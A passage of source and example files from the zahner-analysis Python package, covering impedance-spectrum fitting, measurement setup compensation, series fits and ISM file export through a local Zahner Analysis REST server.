if __name__ == "__main__":
conn = AnalysisConnection(
ip="127.0.0.1",
port=8085,
tryToConnect=True,
tryToStart=True,
onlineCheckUrl="/id",
apiKey="MyKeyToPreventSomeoneElseRemotelyUsingMyAnalysis",
buffer_size=32768,
keep_jobs=10,
timeToWaitForOnline=10,
keepOpen=True,
)
fitting = EisFitting(conn)
fitParams = {
"UpperFrequencyLimit": 100000,
"LowerFrequencyLimit": 1e-6,
"DataSource": "zhit", # "original", "smoothed" or "zhit"
"Smoothness": 0.0002,
"NumberOfSamples": 20,
}
simulationParams = {
"UpperFrequencyLimit": 10e3,
"LowerFrequencyLimit": 1e-6,
"NumberOfSamples": 150,
}
impedanceCircuitModel = IsfxModelImport("li-ion-model.isfx")
impedanceData = IsmImport("li-ion-battery.ism")
simulatedData = fitting.simulate(impedanceCircuitModel, simulationParams)
(fig1, (impedanceAxis1, phaseAxis1)) = bodePlotter(impedanceObject=impedanceData)
(fig1, (impedanceAxis1, phaseAxis1)) = bodePlotter(
(impedanceAxis1, phaseAxis1),
impedanceObject=simulatedData,
argsImpedanceAxis={"linestyle": "solid", "marker": None},
argsPhaseAxis={"linestyle": "solid", "marker": None},
)
phaseAxis1.legend(["Measured Data", "Simulated Model with start values"])
fig1.set_size_inches(18, 10)
plt.show()
foldername = "fit_result"
fig1.savefig(f"{foldername}/bode_not_fitted.png")
fittingResult = fitting.fit(
impedanceCircuitModel,
impedanceData,
fitParams=fitParams,
simulationParams=simulationParams,
)
print(fittingResult)
fittingResult.save(
path="",
foldername=foldername,
exist_ok=True,
saveFitResultJson=True,
saveFittedModel=True,
saveFittedSimulatedSamples=True,
saveFitInputSamples=True,
fitResultJsonFilename="fit_result.json",
fittedModelFilename="fitted.isfx",
fittedSimulatedDataFilename="fitted_simulated.ism",
fitInputDataFilename="fit_samples.ism",
)
(fig2, (impedanceAxis2, phaseAxis2)) = EisFittingPlotter.plotBode(
fittingResult, impedanceData
)
impedanceAxis2.legend(
impedanceAxis2.get_lines() + phaseAxis2.get_lines(),
2 * ["Measured Data", "Fitted Model"],
)
fig2.set_size_inches(18, 10)
plt.show()
fig2.savefig(f"{foldername}/bode_fitted.pdf")
(fig3, (impedanceAxis3, phaseAxis3)) = EisFittingPlotter.plotBode(
fittingResult, impedanceData, zTogetherPhase=False, absPhase=False
)
impedanceAxis3.legend(["Measured Data", "Fitted Model"])
phaseAxis3.legend(["Measured Data", "Fitted Model"])
fig3.set_size_inches(18, 10)
plt.show()
fig3.savefig(f"{foldername}/bode.svg")
(fig4, ax) = EisFittingPlotter.plotNyquist(
fittingResult, impedanceData, minusNyquist=False, maximumAbsImpedance=0.8
)
ax.legend(["Measured Data", "Fitted Model"])
fig4.set_size_inches(15, 15)
plt.show()
fig4.savefig(f"{foldername}/nyquist.jpg")
simulated = fittingResult.getFittedSimulatedData()
fig5, (axis) = plt.subplots(1, 1)
axis.loglog(
simulated.getFrequencyArray(),
simulated.getImpedanceArray(),
marker="o",
linewidth=0,
fillstyle="none",
)
axis.loglog(
impedanceData.getFrequencyArray(),
impedanceData.getImpedanceArray(),
marker="x",
linewidth=0,
fillstyle="none",
)
axis.grid("both")
axis.set_xlabel(r"f")
axis.set_ylabel(r"|Z|")
fig5.set_size_inches(18, 10)
plt.show() | zahner-analysis | /zahner_analysis-1.1.0.tar.gz/zahner_analysis-1.1.0/Examples/ComplexFitConfigurations/ComplexFitConfigurations.py | ComplexFitConfigurations.py |
# Measurement Setup Compensation
The setup compensation is useful for correcting high-frequency errors when measuring low-impedance objects in the mΩ range, where cable inductance is more relevant.
Due to the variety of cables connected and the different geometries of the objects, Zahner instruments are only calibrated up to the front panel.
The formulas for the correction were derived from a theoretical four terminal network, which corresponds to the parasitic behavior of the measuring device and the setup.
This formula is universal. It does not depend on the instrument used:
$Z = \frac{(Z_{\text{short}} - Z_{\text{meas}})(Z_{\text{load}} - Z_{\text{open}})}{(Z_{\text{short}} - Z_{\text{load}})(Z_{\text{meas}} - Z_{\text{open}})} \cdot Z_{\text{load,ref}}$
The parameters are explained in the following table:
Parameter|Description
:---:|:---
$Z_{\text{short}}$|Measurement without object. Short-circuited 4-wire test setup. CE, RE, WE power and WE sense are connected together.
$Z_{\text{open}}$|Measurement without object. CE and RE as well as WE power and WE sense are connected to each other.
$Z_{\text{load}}$|Measurement with a reference object of known defined impedance over the frequency range.
$Z_{\text{load,ref}}$|Real impedance of the reference object of $Z_{\text{load}}$ measurement.
$Z_{\text{meas}}$|Measurement to be corrected.
$Z$|Measurement result corrected with the short, open and load data.
The following points must be taken into account:
## ⚠️WARNING⚠️
* **The results must be checked for plausibility, since incorrectly performed short, open and load measurements can also degrade the measurement results.**
* **With a second measurement of a known object it must be verified if the compensation works or if it worsens the result.**
* **The cable routing must not change after the calibration measurement. Since the cable routing and its impedance and parasitic properties are part of the calibration data.**
* **For the best possible correction, the point density of the calibration measurements must be greater than or equal to that of the measurement to be corrected.**
* **The calibration data are smoothed before the calculation, for this the window length and the polynomial order must be defined.**
* **The order of the polynomial and the length of the window must be set by the user, this affects the result.**
```
from zahner_analysis.analysis_tools.setup_compensation import SetupCompensation
from zahner_analysis.plotting.impedance_plot import bodePlotter
from zahner_analysis.file_import.ism_import import IsmImport
from zahner_analysis.file_export.ism_export import IsmExport
import matplotlib.pyplot as plt
```
# Load the spectra
First, the measurement to be corrected is loaded and the file name for the corrected measurement is set.
Afterwards the compensation object of the type [SetupCompensation](https://doc.zahner.de/zahner_analysis/analyze/index.html#zahner_analysis.analysis_tools.setup_compensation.SetupCompensation) is initialized. Here only the data must be passed, which are to be used for the compensation. As in the example, it also works only with short data.
The parameters passed with `None` can be omitted, since `None` is also the default parameter.
```
if __name__ == "__main__":
originalData = IsmImport("./ExampleData/500uR_measurement_pro.ism")
compensatedDataFileName = (
"./ExampleData/500uR_measurement_pro_short_compensated.ism"
)
compensationData = SetupCompensation(
shortData="./ExampleData/short_circuit_measurement_pro.ism",
openData=None,
loadData=None,
referenceData=None,
)
```
# Select smoothing parameters
The spectra used for calibration are smoothed with a [Savgol filter from the SciPy Python library](https://docs.scipy.org/doc/scipy/reference/generated/scipy.signal.savgol_filter.html).
The user must select and determine the window length and the polynomial order to be used.
```
compensationData.setSmoothingWindowLength(3)
compensationData.setSmoothingPolyOrder(2)
```
# Compensate the original data
With the [compensateIsm](https://doc.zahner.de/zahner_analysis/analyze/index.html#zahner_analysis.analysis_tools.setup_compensation.SetupCompensation.compensateIsm) method of the calibration object created in the previous, the measurements can be compensated by the spectra with which the object was initialized.
```
compensatedData = compensationData.compensateIsm(originalData)
```
# Displaying the results
Finally, the original data and the compensated data are plotted together in a diagram.
A new ism-file is also created. This file contains only impedance information. All other information from the original file are lost, such as the parameters of the measurement.
```
(fig1, (impedanceAxis1, phaseAxis1)) = bodePlotter(
impedanceObject=originalData,
zTogetherPhase=False,
absPhase=False,
argsImpedanceAxis={"marker": None},
argsPhaseAxis={"marker": None},
)
(fig1, (impedanceAxis1, phaseAxis1)) = bodePlotter(
(impedanceAxis1, phaseAxis1),
impedanceObject=compensatedData,
zTogetherPhase=False,
absPhase=False,
argsImpedanceAxis={"linestyle": "solid", "marker": None},
argsPhaseAxis={"linestyle": "solid", "marker": None},
)
impedanceAxis1.legend(["Measured Data", "Compensated Data"])
phaseAxis1.legend(["Measured Data", "Compensated Data"])
impedanceAxis1.set_ylim([250e-6, 1e-3])
phaseAxis1.set_ylim([-15.0, +45.0])
fig1.set_size_inches(18, 10)
plt.show()
exportFile = IsmExport(compensatedData)
exportFile.writeToFile(compensatedDataFileName)
```
| zahner-analysis | /zahner_analysis-1.1.0.tar.gz/zahner_analysis-1.1.0/Examples/SetupCompensation/SetupCompensation.ipynb | SetupCompensation.ipynb |
from zahner_analysis.analysis_tools.eis_fitting import EisFitting
from zahner_analysis.file_import.impedance_model_import import IsfxModelImport
from zahner_analysis.file_import.ism_import import IsmImport
import matplotlib.pyplot as plt
from matplotlib.ticker import EngFormatter
import os
import glob
import re
if __name__ == "__main__":
impedanceCircuitModel = IsfxModelImport(r"diode-ac-model.isfx")
print(impedanceCircuitModel)
print(f"Resistance initial value: {impedanceCircuitModel['R0']['R'].getValue()}\n")
fitting = EisFitting()
spectras = glob.glob(os.path.join("measured_spectras", "*_mvdc.ism"))
measuredVoltageValues = []
fittedResistanceValues = []
for spectra in spectras:
# Fitting the spectra in a loop
print(f"File: {spectra}")
fittingResult = fitting.fit(impedanceCircuitModel, IsmImport(spectra))
# Append arrys with fit results
voltagePattern = r"(\d+)_mvdc.ism"
voltage = float(re.search(voltagePattern, spectra)[1]) / 1000.0
measuredVoltageValues.append(voltage)
fittedResistanceValue = fittingResult.getFittedModel()["R0"]["R"].getValue()
fittedResistanceValues.append(fittedResistanceValue)
voltageFormatter = EngFormatter(unit="V", sep=" ")
resistanceFormatter = EngFormatter(unit="Ω", sep=" ")
print(
f"Voltage: {voltageFormatter.format_data(voltage)} Fitted Resistance: {resistanceFormatter.format_data(fittedResistanceValue)}"
)
# Save the fit results
filename = os.path.splitext(os.path.split(spectra)[1])[0]
fittingResult.save(path="fitted_spectras", foldername=filename)
# Setting the new model for the next fit
impedanceCircuitModel = fittingResult.getFittedModel()
fig, (ax) = plt.subplots(1, 1)
ax.semilogy(measuredVoltageValues, fittedResistanceValues)
ax.xaxis.set_major_formatter(EngFormatter(unit="V"))
ax.yaxis.set_major_formatter(EngFormatter(unit="Ω"))
ax.set_xlabel(r"Voltage across the diode")
ax.set_ylabel(r"Differential Resistance")
ax.grid(which="both", linestyle="--", linewidth=0.5)
fig.set_size_inches(12, 10)
fig.savefig("RvsU.svg")
plt.show() | zahner-analysis | /zahner_analysis-1.1.0.tar.gz/zahner_analysis-1.1.0/Examples/ImpedanceVsVoltageSeriesFit/ImpedanceVsVoltageSeriesFit.py | ImpedanceVsVoltageSeriesFit.py |
# Series Fit
In this example, all impedance spectra in a directory are fitted with a model.
Then a parameter of an element of the model is plotted over the changing series parameter.
```
from zahner_analysis.analysis_tools.eis_fitting import EisFitting
from zahner_analysis.file_import.impedance_model_import import IsfxModelImport
from zahner_analysis.file_import.ism_import import IsmImport
import matplotlib.pyplot as plt
from matplotlib.ticker import EngFormatter
import os
import glob
import re
```
# Import the model
First, the model is loaded from the file on the hard disk.
The model was created with the [Zahner Analysis](https://zahner.de/products-details/software/Zahner-Analysis). For simple models, the standard values of the Zahner Analysis can be used for the fit. This is only necessary for more complex models.
Then an [EisFitting](https://doc.zahner.de/zahner_analysis/analyze/index.html#zahner_analysis.analysis_tools.eis_fitting.EisFitting) object is created with the model. And the model with the initial value is output to the console.
```
if __name__ == "__main__":
impedanceCircuitModel = IsfxModelImport(r"diode-ac-model.isfx")
print(impedanceCircuitModel)
print(f"Resistance initial value: {impedanceCircuitModel['R0']['R'].getValue()}\n")
fitting = EisFitting()
```
# Selection of files for the fit
In the subfolder *measured_spectras* all files ending with *_mvdc.ism* are selected for the fit.
The file name contains the voltage value of the measurement, which is different for each measurement.
```
spectras = glob.glob(os.path.join("measured_spectras", "*_mvdc.ism"))
```
Jupyter does not support loops over multiple cells, so the explanations are given below and in the code block are the headings of the following explanations.
# Fitting the spectra in a loop
The array *spectras* contains all file paths which should be fitted. Then the fit function is called for each of these files.
# Append arrys with fit results
The predefined arrays *measuredVoltageValues* and *fittedResistanceValues* for the voltage values and resistances are filled with the values.
With a [regular expression](https://docs.python.org/3/library/re.html) the voltage is extracted from the filename.
With the [[]-operator](https://doc.zahner.de/zahner_analysis/file_import/index.html#models-circuits) the parameters are read from the fitted model and added to the array.
# Save the fit results
Then, for each data set, the fit result is stored in the subdirectory *fitted_spectras* in a folder with the same name as the ism file.
# Setting the new model for the next fit
Based on the filename, the models are fitted in the correct order, from lower to higher voltage.
**To speed up the fit for the series measurement, the last fitted model is set as the new model for the next fit.**
```
measuredVoltageValues = []
fittedResistanceValues = []
for spectra in spectras:
# Fitting the spectra in a loop
print(f"File: {spectra}")
fittingResult = fitting.fit(impedanceCircuitModel, IsmImport(spectra))
# Append arrys with fit results
voltagePattern = r"(\d+)_mvdc.ism"
voltage = float(re.search(voltagePattern, spectra)[1]) / 1000.0
measuredVoltageValues.append(voltage)
fittedResistanceValue = fittingResult.getFittedModel()["R0"]["R"].getValue()
fittedResistanceValues.append(fittedResistanceValue)
voltageFormatter = EngFormatter(unit="V", sep=" ")
resistanceFormatter = EngFormatter(unit="Ω", sep=" ")
print(
f"Voltage: {voltageFormatter.format_data(voltage)} Fitted Resistance: {resistanceFormatter.format_data(fittedResistanceValue)}"
)
# Save the fit results
filename = os.path.splitext(os.path.split(spectra)[1])[0]
fittingResult.save(path="fitted_spectras", foldername=filename)
# Setting the new model for the next fit
impedanceCircuitModel = fittingResult.getFittedModel()
```
# Plotting the data
The two arrays with resistance values and voltage values are displayed in a diagram with [matplotlib](https://matplotlib.org/).
```
fig, (ax) = plt.subplots(1, 1)
ax.semilogy(measuredVoltageValues, fittedResistanceValues)
ax.xaxis.set_major_formatter(EngFormatter(unit="V"))
ax.yaxis.set_major_formatter(EngFormatter(unit="Ω"))
ax.set_xlabel(r"Voltage across the diode")
ax.set_ylabel(r"Differential Resistance")
ax.grid(which="both", linestyle="--", linewidth=0.5)
fig.set_size_inches(12, 10)
fig.savefig("RvsU.svg")
plt.show()
```
| zahner-analysis | /zahner_analysis-1.1.0.tar.gz/zahner_analysis-1.1.0/Examples/ImpedanceVsVoltageSeriesFit/ImpedanceVsVoltageSeriesFit.ipynb | ImpedanceVsVoltageSeriesFit.ipynb |
import numpy as np
from zahner_analysis.file_import.ism_import import IsmImport
from typing import Optional
class IsmExport:
"""
Class for saving ism data.
With this class only impedances to different frequency points can be stored.
However, the ism files are not complete and can no longer be loaded in Thales, nor do they contain any meta data.
ACQ data is also lost.
:param frequency: Array with the frequency data.
:param impedance: Array with the impedance data.
:param phase: Array with the phase data.
:param metaData: Binary metadata.
"""
def __init__(
self,
ism: Optional[IsmImport] = None,
frequency: Optional[list[float]] = None,
impedance: Optional[list[float]] = None,
phase: Optional[list[float]] = None,
metaData: bytearray = bytearray(),
):
self.startOfFile = bytearray(b"\x00\x00\xff\xff\xff\xfe")
self._binaryFileContent = bytearray()
if ism is not None:
frequency = ism.getFrequencyArray()
impedance = np.abs(ism.getComplexImpedanceArray())
phase = np.angle(ism.getComplexImpedanceArray())
metaData = ism.getMetaData()
self.numberOfElements = min([len(frequency), len(impedance), len(phase)])
significance = np.ones(shape=(self.numberOfElements,), dtype=">i2") * 1000
time = [i for i in range(self.numberOfElements)]
self.tmpFrequency = np.array(frequency, dtype=">f8")
self.tmpImpedance = np.array(impedance, dtype=">f8")
self.tmpPhase = np.array(phase, dtype=">f8")
self.tmpTime = np.array(time, dtype=">f8")
self.tmpSig = np.array(significance, dtype=">i2")
self._binaryFileContent += self.startOfFile
numberToWrite = self.numberOfElements - 1
self._binaryFileContent += numberToWrite.to_bytes(6, "big")
self._binaryFileContent += self.tmpFrequency.tobytes()
self._binaryFileContent += self.tmpImpedance.tobytes()
self._binaryFileContent += self.tmpPhase.tobytes()
self._binaryFileContent += self.tmpTime.tobytes()
self._binaryFileContent += self.tmpSig.tobytes()
self._binaryFileContent += metaData
return
def getBinaryFileContent(self):
"""
Get the content of the file binary.
Returns the file contents as a binary byte array.
:returns: bytearray with the file content.
"""
return self._binaryFileContent
def writeToFile(self, file):
"""
Writing the file to the hard disk.
:param file: Path to the file to be written.
"""
with open(file, "wb") as file:
file.write(self._binaryFileContent)
return | zahner-analysis | /zahner_analysis-1.1.0.tar.gz/zahner_analysis-1.1.0/zahner_analysis/file_export/ism_export.py | ism_export.py |
from zahner_analysis.file_import.ism_import import IsmImport
from zahner_analysis.file_import.impedance_model_import import (
IsfxModelImport,
IsfxModelElement,
IsfxModelElementParameter,
)
from zahner_analysis.plotting.impedance_plot import bodePlotter, nyquistPlotter
from zahner_analysis.analysis_tools.analysis_connection import AnalysisConnection
from zahner_analysis.analysis_tools.error import ZahnerAnalysisError
import os
import json
import io
import logging
import time
DUMMY_MODEL = """<?xml version="1.0" encoding="UTF-8"?>
<zahner-impedance-model name="New Model">
<zahner-fileinfo>
<type>zahner-impedance-model</type>
<file-version>3.0</file-version>
<created>2023-04-13T07:51:22+02:00</created>
<generator>Zahner Analysis</generator>
<generator-version>3.3.5</generator-version>
<comment></comment>
<app-session>cef8c2e3-250d-47ff-9638-ef58933d107e</app-session>
<file-id>e0e0c2a4-296f-40d0-9937-58cad6e47464</file-id>
</zahner-fileinfo>
<parsed-tree>
<serial-connect>
<resistor name="R0">
<parameter index="0" value="100" fitterFixed="1"/>
</resistor>
</serial-connect>
</parsed-tree>
<schematics-graph>
<node pos-x="0" type="1" name="R0" node-id="0" pos-y="-64">
<parameter value="100" fitterFixed="1" index="0"/>
</node>
</schematics-graph>
</zahner-impedance-model>
"""
class EisFittingResult:
"""This class contains the results of the fit.
The constructor of this class is called by the fit method.
:param fitResult: Fit result as JSON string.
:param fittedModel: Model with the fitted parameters.
:param fittedSimulatedData: Data simulated from the model.
:param fitInputData: Data used for the fit.
"""
def __init__(
self,
fitResult: str,
fittedModel: IsfxModelImport,
fittedSimulatedData: IsmImport,
fitInputData: IsmImport,
):
self._fitResult = fitResult
self._fittedModel = fittedModel
self._fittedSimulatedData = fittedSimulatedData
self._fitInputData = fitInputData
return
def getFitResultJson(self, fmt="json"):
"""Get the fit result.
This function returns the fit result as JSON or as string.
The following is an example of the data returned. For each parameter of each element the value,
unit, significance and error is returned. Also data for the overall fit result is returned.
.. code-block:: json
{
"model": {
"C0": {
"C": {
"error": 15.151926309121153,
"significance": 0.032274504286208844,
"value": 0.05020110574526214,
"value_unit": "F"
}
},
"CPE0": {
"C_eq": {
"error": 1.055031648230169,
"significance": 0.2519304540206341,
"value": 0.06756234793290997,
"value_unit": "F"
},
"α": {
"error": 0.5970910562207303,
"significance": 0.6845012405311864,
"value": 0.7366826808067263,
"value_unit": ""
}
},
"FI0": {
"W": {
"error": 0.48845055246742036,
"significance": 0.6408552251285363,
"value": 0.04073380256581006,
"value_unit": "Ωs^(-½)"
},
"k": {
"error": 1.9687457791834184,
"significance": 0.15899771929695322,
"value": 0.0013854241183094132,
"value_unit": "1/s"
}
},
"L0": {
"L": {
"error": 2.8396295426843867,
"significance": 0.6911809622435452,
"value": 7.940027736136356e-07,
"value_unit": "H"
}
},
"R0": {
"R": {
"error": 1.5977793098280266,
"significance": 0.07859404364129204,
"value": 0.0036204263202214014,
"value_unit": "Ω"
}
},
"R1": {
"R": {
"error": 0.529684672149924,
"significance": 0.9232302468243536,
"value": 0.026830261706435942,
"value_unit": "Ω"
}
},
"R2": {
"R": {
"error": 0.18918999015755764,
"significance": 0.4215958599730566,
"value": 0.035941054916087775,
"value_unit": "Ω"
}
}
},
"overall": {
"impedance_error_max": 1.9436053656746468,
"impedance_error_mean": 0.14339995178171594,
"overall_error": 1.1323929422725485,
"phase_error_max": 0.22001396123330905,
"phase_error_mean": 0.018250258203149725
}
}
:param fmt: "json" for json, else string.
:returns: json or string.
"""
if fmt == "json":
return self._fitResult
else:
return json.dumps(
self._fitResult, ensure_ascii=False, sort_keys=True, indent=2
)
def getFittedModel(self) -> IsfxModelImport:
"""Get the fitted model.
:returns: The model.
"""
return self._fittedModel
def getFittedSimulatedData(self) -> IsmImport:
"""Get the fitted simulated data.
These data were generated by a simulation of the model.
:returns: The data.
"""
return self._fittedSimulatedData
def getFitInputData(self) -> IsmImport:
"""Get the samples used for fitting.
These frequency points from the original data were used for the fit.
These are the original measurement points used for the fit.
These points were already smoothed or pre-processed with the ZHIT when it was set.
:returns: The data.
"""
return self._fitInputData
def save(
self,
path="",
foldername="",
exist_ok=True,
saveFitResultJson=True,
saveFittedModel=True,
saveFittedSimulatedSamples=True,
saveFitInputSamples=True,
fitResultJsonFilename="fit_result.json",
fittedModelFilename="fitted.isfx",
fittedSimulatedDataFilename="fitted_simulated.ism",
fitInputDataFilename="fit_samples.ism",
):
"""Save all fit data.
With this function, all the results files of the fit can be saved to the hard disk.
It can be selected what all can be saved with. By default, everything is saved.
:param path: Path where a folder with the fit results will be created.
This path can also be relative, as with all paths in Python.
:param foldername: Name of the folder in which the data will be saved.
:param exist_ok: Parameter of the os.makedirs function which is used to create the folder.
If exist_ok is False, an FileExistsError is raised if the target directory already exists.
:param saveFitResultJson: If true, the json is stored under the filename of the variable fitResultJsonFilename.
:param saveFittedModel: If true, the model is stored under the filename of the variable fittedModelFilename.
:param saveFittedSimulatedSamples: If true, the simulated fitted data is stored under the filename of the variable fittedSimulatedDataFilename.
:param saveFitInputSamples: If true, the samples used for fit are stored under the filename of the variable fitInputDataFilename.
:param fitResultJsonFilename: Filename for the JSON with the fit result.
:param fittedModelFilename: Filename for the fitted model.
:param fittedSimulatedDataFilename: Filename for the data simulated with the model.
:param fitInputDataFilename: Filename for the data of the points used for the fit.
"""
path = os.path.join(path, foldername)
os.makedirs(path, exist_ok=exist_ok)
if saveFitResultJson:
with open(
os.path.join(path, fitResultJsonFilename), "w", encoding="utf-8"
) as f:
f.write(self.getFitResultJson(fmt="txt"))
if saveFittedModel:
self._fittedModel.save(os.path.join(path, fittedModelFilename))
if saveFittedSimulatedSamples:
self._fittedSimulatedData.save(
os.path.join(path, fittedSimulatedDataFilename)
)
if saveFitInputSamples:
self._fitInputData.save(os.path.join(path, fitInputDataFilename))
return
def __str__(self):
"""Create string with informations about the model
When this object is converted to a string, this function is called.
:returns: A string with the information.
"""
retval = f"Fitted Model:\n"
retval += self.getFittedModel().toString()
retval += "JSON fit result:\n"
retval += self.getFitResultJson(fmt="txt")
return retval
class EisFitting:
"""Class which can fit models to impedance spectra.
This class uses the REST interface of the Zahner Analysis for fitting.
This class uses the `Python logging module <https://docs.python.org/3/library/logging.html/>`_,
which can be enabled and output with the following sample configuration.
.. code-block:: python
import logging
if __name__ == "__main__":
logging.basicConfig(
filename='logfile.log',
level=logging.DEBUG,
format='%(asctime)s.%(msecs)03d %(levelname)s %(module)s - %(funcName)s: %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
)
conn = AnalysisConnection(
ip="127.0.0.1",
port=8085,
tryToConnect=True,
tryToStart=True,
onlineCheckUrl="/id",
apiKey="MyKeyToPreventSomeoneElseRemotelyUsingMyAnalysis",
buffer_size=32768,
keep_jobs=10,
timeToWaitForOnline=10,
keepOpen=True)
fitting = ImpedanceFitting(conn)
:param analysisConnection: Optional connection object to the Zahner Analysis.
Not needed if Zahner Analysis is installed locally.
"""
classAnalysisConnection: AnalysisConnection = None
def __init__(self, analysisConnection: AnalysisConnection = None):
self._analysisConnection = analysisConnection
if self._analysisConnection is None:
if EisFitting.classAnalysisConnection is None:
EisFitting.classAnalysisConnection = AnalysisConnection()
self._analysisConnection = EisFitting.classAnalysisConnection
return
def zhit(
self,
data: IsmImport = None,
parameters: dict = {},
timeout: float = None,
) -> IsmImport:
"""
Performs the ZHIT evaluation.
ZHIT is a software tool that uses measured phase data to reconstruct the impedance spectrum.
The reconstructed impedance spectrum is then compared to the measured impedance spectrum to validate the measurement and identify any artifacts.
Links to the topic ZHIT:
* https://en.wikipedia.org/wiki/Z-HIT
* https://doc.zahner.de/manuals/zahner_analysis.pdf
Parameter dictionary for optional parameters:
.. csv-table::
:header-rows: 1
Key , Description
Smoothness , Factor with which smoothed. This must be determined empirically in the GUI.
NumberOfSamples , Number of samples used for the data. Default all samples.
.. code-block:: python
parameters = {
"Smoothness": 0.0002,
"NumberOfSamples": 20
}
:param data: Data to which the ZHIT is applied.
:param parameters: Optional parameters for the ZHIT.
:param timeout: Timeout for the caculation.
"""
model = IsfxModelImport(xmlString=DUMMY_MODEL)
parameters["DataSource"] = "zhit"
# A fit is performed and then everything is discarded except the data used for the fit.
fitResult = self.fit(model, data, parameters, timeout=timeout)
return fitResult.getFitInputData()
def fit(
self,
model: IsfxModelImport,
data: IsmImport = None,
fitParams: dict = {},
simulationParams: dict = {},
timeout: float = None,
) -> EisFittingResult:
"""
Performing the fit.
With this method the model is fitted to the data.
The initial values and the model can be easily developed using the Zahner Analysis GUI.
The parameters are optional. You can also use only some optional parameters and omit others.
Parameter dictionary for optional fit parameters:
.. csv-table::
:header-rows: 1
Key , Description
UpperFrequencyLimit , Upper frequency limit up to which the data is used for fitting. Default highest frequency.
LowerFrequencyLimit , Lower frequency limit downto to which the data is used for fitting. Default lowest frequency.
DataSource , Selection of the data to be used for the fit. "original" or "smoothed" or "zhit". Default "original".
Smoothness , Factor with which smoothed. This must be determined empirically in the GUI.
NumberOfSamples , Number of samples used for the fit. Default all samples.
.. code-block:: python
fitParams = {
"UpperFrequencyLimit": 100000,
"LowerFrequencyLimit": 1e-6,
"DataSource": "zhit", # "original", "smoothed" or "zhit"
"Smoothness": 0.0002,
"NumberOfSamples": 20
}
Parameter dictionary for optional simulation parameters:
.. csv-table::
:header-rows: 1
Key , Description
UpperFrequencyLimit , Upper frequency limit up to which the model is simulated. Default highest frequency of data.
LowerFrequencyLimit , Lower frequency limit downto to which the model is simulated. Default lowest frequency of data.
NumberOfSamples , Number of samples used for the simulation. Default 100.
.. code-block:: python
simulationParams = {
"UpperFrequencyLimit": 10e3,
"LowerFrequencyLimit": 1e-6,
"NumberOfSamples": 150
}
:param model: Model which is fitted to the data.
:param data: Data to which the model is fitted.
:param fitParams: Explained in the previous text.
:param simulationParams: Explained in the previous text.
:param timeout: Timeout for the fit.
"""
paramsDict = dict()
paramsDict["job"] = "EvalEis.Fit"
paramsDict["parameters"] = {"Fit": fitParams, "Simulation": simulationParams}
paramsDict["mode"] = "queued"
jobId = self._startFit(model, data, paramsDict)
logging.debug("Zahner Analysis job-id: " + jobId)
fitResult = self._waitForJob(jobId, timeout)
if fitResult is None:
raise ZahnerAnalysisError("Operation in Zahner Analysis Server failed")
fittedModel = self._readFittedModel(jobId)
fittedSimulatedSamples = self._readSimulatedData(jobId)
fitInputSamples = self._readFitInputData(jobId)
return EisFittingResult(
fitResult, fittedModel, fittedSimulatedSamples, fitInputSamples
)
def _startFit(self, model: IsfxModelImport, data: IsmImport, params: dict) -> str:
"""
Function which starts the fit.
This function sends the model, data and parameters to the Zahner Analysis via HTTP post request.
The JobId assigned by Zahner Analysis is returned.
:param model: Model which is fitted to the data.
:param data: Data to which the model is fitted.
:param dict: Dictionary {"Fit":fitParams, "Simulation":simulationParams}.
:returns: JobId
"""
files = [
("eis-file", (data.getFileName(), io.BytesIO(data.getBinaryFileContent()))),
(
"model-file",
(model.getFileName(), io.BytesIO(model.getBinaryFileContent())),
),
("job", (None, json.dumps(params).encode("utf-8"))),
]
reply = self._analysisConnection.post("/job/start", files=files)
if reply.status_code == 200:
replyContent = json.loads(reply.content)
jobId = replyContent["job-id"]
if replyContent["status"] in ["failed", "error"]:
logging.error("Zahner Analysis reply: " + str(replyContent))
else:
logging.error("Zahner Analysis reply: " + str(replyContent))
return jobId
def simulate(
self, model: IsfxModelImport, simulationParams: dict, timeout: float = None
) -> IsmImport:
"""
Simulate the model.
With this method, an impedance spectrum is generated from the model.
Parameter dictionary for simulation parameters:
.. csv-table::
:header-rows: 1
Key , Description
UpperFrequencyLimit , Upper frequency limit up to which the model is simulated. Default highest frequency of data.
LowerFrequencyLimit , Lower frequency limit downto to which the model is simulated. Default lowest frequency of data.
NumberOfSamples , Number of samples used for the simulation. Default 100.
.. code-block:: python
simulationParams = {
"UpperFrequencyLimit": 10e3,
"LowerFrequencyLimit": 1e-6,
"NumberOfSamples": 150
}
:param model: Model to be simulated.
:param simulationParams: Explained in the previous text.
:param timeout: Timeout for the fit.
"""
paramsDict = dict()
paramsDict["job"] = "EvalEis.Sim"
paramsDict["parameters"] = {"Simulation": simulationParams}
paramsDict["mode"] = "queued"
jobId = self._startSimulation(model, paramsDict)
logging.debug("Zahner Analysis job-id: " + jobId)
self._waitForJob(jobId, timeout)
return self._readSimulatedData(jobId)
def _startSimulation(self, model: IsfxModelImport, params: dict) -> str:
"""
Function which starts the simulation.
This function sends the model and parameters to the Zahner Analysis via HTTP post request.
The JobId assigned by Zahner Analysis is returned.
:param model: Model to be simulated.
:param dict: Dictionary {"Simulation":simulationParams}.
:returns: JobId
"""
files = [
(
"model-file",
(model.getFileName(), io.BytesIO(model.getBinaryFileContent())),
),
("job", (None, json.dumps(params).encode("utf-8"))),
]
reply = self._analysisConnection.post("/job/start", files=files)
if reply.status_code == 200:
replyContent = json.loads(reply.content)
jobId = replyContent.get("job-id")
if replyContent["status"] in ["failed", "error"]:
logging.error("Zahner Analysis reply: " + str(replyContent))
else:
logging.error("Zahner Analysis reply: " + str(replyContent))
return jobId
def _waitForJob(self, jobId: str, timeout: float = None):
"""
Function which is waiting for the fit result.
This function polls the status of the fit operation and reads the fit result as JSON.
:param jobId: JobId.
:param timeout: Time for which polling should be done in seconds, or None for infinite.
:returns: Fit result as JSON string.
"""
result = None
continueWait = True
startTime = time.time()
while continueWait:
reply = self._analysisConnection.get(f"/job/{jobId}/status")
if reply.status_code == 200:
replyContent = json.loads(reply.content)
jobStatus = replyContent["status"]
if jobStatus == "done":
continueWait = False
result = replyContent.get("result")
elif jobStatus == "failed":
continueWait = False
logging.error("Zahner Analysis fitting failed")
else:
diffTime = time.time() - startTime
if timeout is not None:
if diffTime > timeout:
logging.error("Zahner Analysis fitting timeout")
continueWait = False
if continueWait == True:
time.sleep(0.02) # poll status every 20 ms
else:
continueWait = False
logging.error(
"Zahner Analysis reply: " + str(json.loads(reply.content))
)
return result
def _readFittedModel(self, jobId) -> IsfxModelImport:
"""
Reading the fitted model from the Zahner Analysis.
Reading is done via http get request.
:param jobId: JobId.
:returns: Object from received data.
"""
reply = self._analysisConnection.get(f"/job/{jobId}/model")
